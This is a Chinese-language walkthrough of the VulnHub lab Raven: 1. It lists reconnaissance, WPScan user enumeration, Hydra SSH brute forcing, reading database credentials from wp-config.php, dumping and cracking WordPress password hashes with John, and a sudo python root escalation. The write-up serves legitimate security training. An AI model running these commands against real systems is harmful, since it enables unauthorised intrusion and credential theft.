一、准备工作

kali和靶机都选择NAT模式（kali与靶机同网段）

1.靶场环境

下载链接:Raven: 1 ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

（1）扫描靶机开放的端口及其服务

nmap -A 192.168.101.127

2.网站的信息收集

（1）靶机开放了80端口,先访问靶机网站看看有什么有用的信息

1.访问到http://192.168.101.127/service.html，它的源码发现flag1

2.进入到BLOG，发现wordpress网站

3.看到wordpress网站后台登录到入口

DNS域名解析有问题

4.添加后台域名到hosts文件

1）编辑hosts文件，添加如下内容

sudo vim /etc/hosts

192.168.101.127 raven.local

：wq！

2）重新刷新页面，访问成功

（2）WPscan工具

探测WordPress的漏洞，可以直接使用kali自带的WPscan，先暴力枚举用户名

wpscan --url http://192.168.101.127/wordpress/ -eu

1.发现了两个用户michael和steven，将收集到的用户放到user.txt

（3）hydra工具暴力破解

1.使用hydra运用自身密码库进行暴力破解

cp /usr/share/wordlists/rockyou.txt pass

hydra -L user.txt -P pass 192.168.101.127 ssh

获取到ssh登录到用户密码：michael

（4）ssh远程登录

ssh michael@192.168.101.127

三、漏洞的发现及利用

1.寻找一下flag相关文件

find / -name *flag* 2>/dev/null

（1）查看flag2.txt,拿到flag2

cat /var/www/flag2.txt

2.MySQL

（1）查看靶机是否运行mysql

ps -ef |grep mysql

（2）切换到wordpress目录，发现config配置文件，可能存在用户密码

cd /var/www/html/wordpress

ls -la

（3）查看config文件，发现了数据库的用户密码

用户密码为：root、R@v3nSecurity

cat wp-config.php

（4）用刚才收集到的数据库用户密码登录mysql

mysql -u root -p

R@v3nSecurity

（5）查看mysql的数据库

show databases;

（6）获取数据库里面的flag3、flag4

use wordpress ;

show tables ;

desc wp_posts;

select * from wp_posts;

（7）发现两组用户密码

use wordpress ;

select * from wp_wp_users ;

michael :$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

（8）john解码，最后得到steven：pink84

把密码放入文件swn里面通过john解码

vim swn.txt

cat swn.txt

john swn.txt --wordlist=/usr/share/wordlists/rockyou.txt

四、提权

（1）使用steven用户远程登录ssh

ssh steven@192.168.101.127

pink84

（2）利用优化命令执行终端的命令提权

sudo python -c 'import pty; pty.spawn("/bin/bash");'

flag也可在root查看